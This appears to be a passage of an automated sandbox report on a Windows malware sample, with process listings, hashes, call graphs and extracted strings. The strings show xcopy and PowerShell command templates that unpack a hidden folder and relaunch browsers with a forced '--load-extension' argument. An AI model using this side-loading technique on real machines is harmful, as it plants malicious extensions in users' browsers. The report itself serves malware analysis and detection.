                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\Odx9a70VBK1g"
                                                                                                                  Imagebase:0xff760000
                                                                                                                  File size:43008 bytes
                                                                                                                  MD5 hash:20CF8728C55A8743AAC86FB8D30EA898
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:36
                                                                                                                  Start time:13:21:35
                                                                                                                  Start date:21/03/2023
                                                                                                                  Path:C:\Windows\System32\xcopy.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\EqwqqQBb6Hr3"
                                                                                                                  Imagebase:0xffe50000
                                                                                                                  File size:43008 bytes
                                                                                                                  MD5 hash:20CF8728C55A8743AAC86FB8D30EA898
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:37
                                                                                                                  Start time:13:21:35
                                                                                                                  Start date:21/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe "-180126430115798039051631232828-2691859771612897714135344637115556289411055654796"
                                                                                                                  Imagebase:0xfffe0000
                                                                                                                  File size:338432 bytes
                                                                                                                  MD5 hash:CE476F23405AADC46039AC13127DF473
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Reset < >

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:9.8%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:44.2%
                                                                                                                    Total number of Nodes:113
                                                                                                                    Total number of Limit Nodes:3
                                                                                                                    execution_graph 238 7fef90217e0 _malloc_crt RtlEncodePointer 239 7fef9021815 _RTC_Initialize 238->239 243 7fef9021810 238->243 244 7fef9021e1c 239->244 242 7fef9021e1c pre_c_init 7 API calls 242->243 247 7fef9021d6c _decode_pointer 244->247 246 7fef902182a 246->242 248 7fef9021d8d _onexit 247->248 250 7fef9021d98 247->250 249 7fef9021e13 248->249 249->246 251 7fef9021da2 _decode_pointer _decode_pointer _encode_pointer 250->251 252 7fef9022056 251->252 253 7fef9021de2 _encode_pointer _encode_pointer 252->253 253->249 360 7fef9022100 __CppXcptFilter 361 7fef9021d60 362 7fef902204a __clean_type_info_names_internal 361->362 363 7fef9021bd4 364 7fef9021bf0 363->364 365 7fef9021bf5 363->365 367 7fef9021f90 364->367 368 7fef9021fc2 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 367->368 369 7fef9021fb6 367->369 368->369 369->365 370 7fef9022149 _unlock 254 7fef9021a9c 256 7fef9021acb 254->256 255 7fef9021b0c 265 7fef9021ad3 255->265 283 7fef9021000 255->283 256->255 256->265 266 7fef9021840 256->266 259 7fef9021b27 260 7fef9021b50 259->260 262 7fef9021000 57 API calls 259->262 261 7fef9021840 13 API calls 260->261 260->265 261->265 263 7fef9021b43 262->263 264 7fef9021840 13 API calls 263->264 264->260 267 7fef902186d 266->267 269 7fef90219a5 266->269 268 7fef90218b2 267->268 271 7fef902189a Sleep 267->271 278 7fef9021983 267->278 274 7fef90218c5 _amsg_exit 268->274 275 7fef90218d4 _decode_pointer 268->275 270 7fef90219dc 269->270 272 7fef90219c4 Sleep 269->272 269->278 273 7fef90219ed _amsg_exit 270->273 270->278 271->267 272->269 273->278 274->278 276 7fef90218ed _decode_pointer 275->276 275->278 277 7fef90218fd 276->277 279 7fef9021966 free _encoded_null 277->279 280 7fef9021912 _encoded_null 277->280 278->255 279->278 280->277 281 7fef902191e _decode_pointer _encoded_null 280->281 282 7fef9021937 _decode_pointer _decode_pointer 281->282 282->277 284 7fef9021013 283->284 285 7fef9021009 283->285 288 7fef9021110 _time64 srand GetCommandLineA strstr 284->288 285->259 289 7fef90211ca strchr 288->289 290 7fef902115a strstr 288->290 292 7fef902206e 289->292 290->289 291 7fef902116f strstr 290->291 291->289 293 7fef9021184 strstr 291->293 294 7fef9021201 strncpy_s 292->294 293->289 295 7fef9021199 strstr 293->295 296 7fef902123a 294->296 295->289 297 7fef90211ae strstr 295->297 298 7fef9021245 memset WideCharToMultiByte WideCharToMultiByte 296->298 299 7fef90211c3 296->299 297->289 297->299 338 7fef9021770 vsprintf_s 298->338 351 7fef90217c0 299->351 301 7fef9021314 GetFileAttributesA 303 7fef902146b 301->303 304 7fef902132b 301->304 306 7fef9021480 rand 303->306 339 7fef9021770 vsprintf_s 304->339 305 7fef902101f 305->259 306->306 308 7fef90214bb 306->308 345 7fef9021770 vsprintf_s 308->345 309 7fef9021347 340 7fef9021770 vsprintf_s 309->340 312 7fef90214e7 346 7fef9021770 vsprintf_s 312->346 313 7fef9021363 FindResourceA 315 7fef9021391 Sleep 313->315 316 7fef9021381 313->316 344 7fef9021770 vsprintf_s 315->344 341 7fef9021030 SizeofResource LoadResource 316->341 317 7fef902150b memset CreateProcessA 320 7fef90215be strstr 317->320 321 7fef902158a WaitForSingleObject GetExitCodeProcess CloseHandle CloseHandle 317->321 320->299 323 7fef90215d8 320->323 321->320 322 7fef90213c0 memset CreateProcessA 322->303 324 7fef9021437 WaitForSingleObject GetExitCodeProcess CloseHandle CloseHandle 322->324 325 7fef902161e 323->325 326 7fef90215ee strstr 323->326 324->303 347 7fef9021770 vsprintf_s 325->347 326->325 327 7fef9021604 strstr 326->327 327->299 327->325 329 7fef902163e strstr 330 7fef9021671 329->330 331 7fef9021653 329->331 349 7fef9021770 vsprintf_s 330->349 348 7fef9021770 vsprintf_s 331->348 334 7fef902166f 335 7fef902168d CreateFileA 334->335 350 7fef9021770 vsprintf_s 335->350 337 7fef90216e2 WriteFile CloseHandle WinExec exit 337->299 338->301 339->309 340->313 342 7fef9021073 LockResource CreateFileA WriteFile CloseHandle FreeResource 341->342 343 7fef90210ea 341->343 342->343 343->315 344->322 345->312 346->317 347->329 348->334 349->335 350->337 352 7fef90217c9 351->352 353 7fef90217d4 352->353 354 7fef9021c14 RtlCaptureContext RtlLookupFunctionEntry 352->354 353->305 355 7fef9021c99 354->355 356 7fef9021c58 RtlVirtualUnwind 354->356 357 7fef9021cbb IsDebuggerPresent __crt_debugger_hook SetUnhandledExceptionFilter UnhandledExceptionFilter 355->357 356->357 358 7fef9021d42 GetCurrentProcess TerminateProcess 357->358 359 7fef9021d38 __crt_debugger_hook 357->359 358->305 359->358

                                                                                                                    Callgraph

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 7fef9021840-7fef9021867 1 7fef90219a5-7fef90219a8 0->1 2 7fef902186d-7fef9021875 0->2 5 7fef90219ae-7fef90219bd 1->5 6 7fef9021a75 1->6 3 7fef902199e-7fef90219a0 2->3 4 7fef902187b-7fef9021893 2->4 7 7fef9021a7a-7fef9021a98 3->7 8 7fef90218a5-7fef90218b0 4->8 9 7fef90219cf-7fef90219da 5->9 6->7 10 7fef9021895-7fef9021898 8->10 11 7fef90218b2 8->11 12 7fef90219bf-7fef90219c2 9->12 13 7fef90219dc 9->13 14 7fef90218b4 10->14 15 7fef902189a-7fef902189f Sleep 10->15 16 7fef90218ba-7fef90218c3 11->16 17 7fef90219de 12->17 18 7fef90219c4-7fef90219c9 Sleep 12->18 19 7fef90219e3-7fef90219eb 13->19 14->16 15->8 22 7fef90218c5-7fef90218cf _amsg_exit 16->22 23 7fef90218d4-7fef90218e7 _decode_pointer 16->23 17->19 18->9 20 7fef90219f9-7fef9021a11 call 7fef9021f78 19->20 21 7fef90219ed-7fef90219f7 _amsg_exit 19->21 28 7fef9021a16-7fef9021a18 20->28 24 7fef9021a37-7fef9021a39 21->24 22->6 26 7fef9021983-7fef902198c 23->26 27 7fef90218ed-7fef90218fa _decode_pointer 23->27 30 7fef9021a45-7fef9021a4c 24->30 31 7fef9021a3b-7fef9021a3e 24->31 26->6 29 7fef9021992-7fef9021999 26->29 32 7fef90218fd-7fef9021900 27->32 28->3 33 7fef9021a1a-7fef9021a2d call 7fef9021f72 28->33 29->6 34 7fef9021a6f 30->34 35 7fef9021a4e-7fef9021a5c call 7fef9021f30 30->35 31->30 36 7fef9021903-7fef902190a 32->36 33->24 34->6 35->34 44 7fef9021a5e-7fef9021a66 35->44 39 7fef9021966-7fef902197c free _encoded_null 36->39 40 7fef902190c-7fef9021910 36->40 39->26 40->36 43 7fef9021912-7fef902191c _encoded_null 40->43 43->36 45 7fef902191e-7fef9021957 _decode_pointer _encoded_null _decode_pointer * 2 43->45 44->34 47 7fef902195e-7fef9021964 45->47 48 7fef9021959-7fef902195c 45->48 47->32 48->36 48->47
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.932037514.000007FEF9021000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF9020000, based on PE: true
                                                                                                                    • Associated: 00000015.00000002.932030976.000007FEF9020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 00000015.00000002.932047910.000007FEF9023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 00000015.00000002.932059653.000007FEF9025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_7fef9020000_xcopy.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _decode_pointer$_encoded_null$Sleep_amsg_exit$free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 202189145-0
                                                                                                                    • Opcode ID: eb76989a66814227529f6658e0800ceb1c58a7eff03fb6f9f0c31b969ebadde4
                                                                                                                    • Instruction ID: 1f7cdac8b485806e42c8883af517ffb230ebd390df95b50b330e2308c5bd795f
                                                                                                                    • Opcode Fuzzy Hash: eb76989a66814227529f6658e0800ceb1c58a7eff03fb6f9f0c31b969ebadde4
                                                                                                                    • Instruction Fuzzy Hash: A2610520E0DA5296EAE09B11EC8437C62E7BB84B84F540136D9DEC63B6EE7CE5818600
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 92 7fef9021110-7fef9021158 _time64 srand GetCommandLineA strstr 93 7fef90211ca-7fef902123c strchr call 7fef902206e strncpy_s call 7fef902179c 92->93 94 7fef902115a-7fef902116d strstr 92->94 103 7fef902123e-7fef9021240 93->103 104 7fef9021245-7fef9021325 memset WideCharToMultiByte * 2 call 7fef9021770 GetFileAttributesA 93->104 94->93 95 7fef902116f-7fef9021182 strstr 94->95 95->93 97 7fef9021184-7fef9021197 strstr 95->97 97->93 99 7fef9021199-7fef90211ac strstr 97->99 99->93 101 7fef90211ae-7fef90211c1 strstr 99->101 101->93 105 7fef90211c3-7fef90211c5 101->105 106 7fef9021746-7fef902174e 103->106 111 7fef902146b-7fef902147f 104->111 112 7fef902132b-7fef902137f call 7fef9021770 * 2 FindResourceA 104->112 108 7fef9021756-7fef902176e call 7fef90217c0 105->108 106->108 114 7fef9021480-7fef90214b9 rand 111->114 123 7fef9021391-7fef9021435 Sleep call 7fef9021770 memset CreateProcessA 112->123 124 7fef9021381-7fef902138c call 7fef9021030 112->124 114->114 116 7fef90214bb-7fef9021588 call 7fef9021770 * 2 memset CreateProcessA 114->116 128 7fef90215be-7fef90215d2 strstr 116->128 129 7fef902158a-7fef90215b8 WaitForSingleObject GetExitCodeProcess CloseHandle * 2 116->129 123->111 133 7fef9021437-7fef9021465 WaitForSingleObject GetExitCodeProcess CloseHandle * 2 123->133 124->123 131 7fef9021734-7fef9021744 128->131 132 7fef90215d8-7fef90215ec 128->132 129->128 131->106 134 7fef902161e-7fef9021651 call 7fef9021770 strstr 132->134 135 7fef90215ee-7fef9021602 strstr 132->135 133->111 139 7fef9021671-7fef9021688 call 7fef9021770 134->139 140 7fef9021653-7fef902166f call 7fef9021770 134->140 135->134 136 7fef9021604-7fef9021618 strstr 135->136 136->131 136->134 144 7fef902168d-7fef9021733 CreateFileA call 7fef9021770 WriteFile CloseHandle WinExec exit 139->144 140->144 144->131
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.932037514.000007FEF9021000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF9020000, based on PE: true
                                                                                                                    • Associated: 00000015.00000002.932030976.000007FEF9020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 00000015.00000002.932047910.000007FEF9023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 00000015.00000002.932059653.000007FEF9025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_7fef9020000_xcopy.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: strstr$CloseHandle$Process$CreateFilememset$ByteCharCodeExitMultiObjectSingleWaitWide$AttributesCommandExecFindLineResourceSleepWrite_time64exitrandsrandstrchrstrncpy_s
                                                                                                                    • String ID: $%s\Temp\%s$%s\WindowsApp\chrome.bat$%s\WindowsApp\googledoc$%s\WindowsApp\googledoc.zip$%s\WindowsApp\msedge.bat$--load-extension$--load-extension="%s" %s$--profile-directory$--single-argument$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz$BACKUP$brave.exe$chrome.exe$h$launcher.exe$msedge.exe$opera.exe$powershell -command "Expand-Archive -Force '%s' '%s'"$start "Chrome" "%s" %s$vivaldi.exe$xcopy /E /I /Y "%s" "%s"
                                                                                                                    • API String ID: 2680544490-789846320
                                                                                                                    • Opcode ID: 45448c22f58de9e6846bf6532eb5222211f8ed0fa3cb28bafb3f41a45a891f99
                                                                                                                    • Instruction ID: f2cf71b21e22c940c3c5569955ead9e0f10c2ad767058b0ec3e6428e65197807
                                                                                                                    • Opcode Fuzzy Hash: 45448c22f58de9e6846bf6532eb5222211f8ed0fa3cb28bafb3f41a45a891f99
                                                                                                                    • Instruction Fuzzy Hash: D9F12E3160CA8691EAA0DF20F8547EEB3A6F784B94F805126D6DD43AB9DF7CD149CB40
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.932037514.000007FEF9021000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF9020000, based on PE: true
                                                                                                                    • Associated: 00000015.00000002.932030976.000007FEF9020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 00000015.00000002.932047910.000007FEF9023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 00000015.00000002.932059653.000007FEF9025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_7fef9020000_xcopy.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterProcessUnhandled__crt_debugger_hook$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3815035489-0
                                                                                                                    • Opcode ID: 01cd6ac5061c10286300818a64f8aa9cc860d2360cdc453e9f2ba07a792adca3
                                                                                                                    • Instruction ID: c3de1eee4e47b0ade78536a276e64fe5d625dc3b41f6c3ae33a5d908b32f76b8
                                                                                                                    • Opcode Fuzzy Hash: 01cd6ac5061c10286300818a64f8aa9cc860d2360cdc453e9f2ba07a792adca3
                                                                                                                    • Instruction Fuzzy Hash: 9131BC35A08B4685EBA09B55FC903AE73E6F784794F500126DACD42B75DF7CE098CB04
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.932037514.000007FEF9021000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF9020000, based on PE: true
                                                                                                                    • Associated: 00000015.00000002.932030976.000007FEF9020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 00000015.00000002.932047910.000007FEF9023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 00000015.00000002.932059653.000007FEF9025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_7fef9020000_xcopy.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1445889803-0
                                                                                                                    • Opcode ID: 9682a452792fa25f25331c8cefab9fe4c26d1809d8bd7f3b5123ddf9508703d9
                                                                                                                    • Instruction ID: 8175249984117431354cff39661b78249d85319fd8d16af6b398b9b8d8942693
                                                                                                                    • Opcode Fuzzy Hash: 9682a452792fa25f25331c8cefab9fe4c26d1809d8bd7f3b5123ddf9508703d9
                                                                                                                    • Instruction Fuzzy Hash: 74016D21A18A0582E7D08F21FC9476D73A2F749F90F446630EE9E477B0DA3CD8898700
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.932037514.000007FEF9021000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF9020000, based on PE: true
                                                                                                                    • Associated: 00000015.00000002.932030976.000007FEF9020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 00000015.00000002.932047910.000007FEF9023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 00000015.00000002.932059653.000007FEF9025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_7fef9020000_xcopy.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$File$CloseCreateFreeHandleLoadLockSizeofWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1937838435-0
                                                                                                                    • Opcode ID: a380c680458651d6193298bc3d125b0b288413983198f693edc7c4ee879c40c8
                                                                                                                    • Instruction ID: 6bd3df658c81ed73696a93ab94107faa3f42b45319b922b25674c5678044ac80
                                                                                                                    • Opcode Fuzzy Hash: a380c680458651d6193298bc3d125b0b288413983198f693edc7c4ee879c40c8
                                                                                                                    • Instruction Fuzzy Hash: A3111C35A08B8186EB908B52B86872EB7A1F789FD4F045164DECD47B68CF7CD0458B14
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • _decode_pointer.MSVCR90(?,?,00000000,000007FEF9021E25,?,?,?,?,000007FEF902182A), ref: 000007FEF9021D7C
                                                                                                                    • _onexit.MSVCR90 ref: 000007FEF9021D90
                                                                                                                    • _decode_pointer.MSVCR90(?,?,00000000,000007FEF9021E25,?,?,?,?,000007FEF902182A), ref: 000007FEF9021DAA
                                                                                                                    • _decode_pointer.MSVCR90(?,?,00000000,000007FEF9021E25,?,?,?,?,000007FEF902182A), ref: 000007FEF9021DBC
                                                                                                                    • _encode_pointer.MSVCR90(?,?,00000000,000007FEF9021E25,?,?,?,?,000007FEF902182A), ref: 000007FEF9021DCA
                                                                                                                    • _encode_pointer.MSVCR90(?,?,00000000,000007FEF9021E25,?,?,?,?,000007FEF902182A), ref: 000007FEF9021DEA
                                                                                                                    • _encode_pointer.MSVCR90(?,?,00000000,000007FEF9021E25,?,?,?,?,000007FEF902182A), ref: 000007FEF9021DFC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000015.00000002.932037514.000007FEF9021000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF9020000, based on PE: true
                                                                                                                    • Associated: 00000015.00000002.932030976.000007FEF9020000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 00000015.00000002.932047910.000007FEF9023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 00000015.00000002.932059653.000007FEF9025000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_21_2_7fef9020000_xcopy.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _decode_pointer_encode_pointer$_onexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1781829819-0
                                                                                                                    • Opcode ID: 09d4dc2b34d1db0ff2d5d353d65dfc21aa27d19a52923921e6b037b2558badaf
                                                                                                                    • Instruction ID: c977052e329d27382bfad886cad9f9484a84a55e2bc2ba6bdb2b57771492d334
                                                                                                                    • Opcode Fuzzy Hash: 09d4dc2b34d1db0ff2d5d353d65dfc21aa27d19a52923921e6b037b2558badaf
                                                                                                                    • Instruction Fuzzy Hash: C911E520A09A02D2EAC49B51FC5437D77A6FBC8FA1F001130A9EE863B5DE2CE4A58700
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%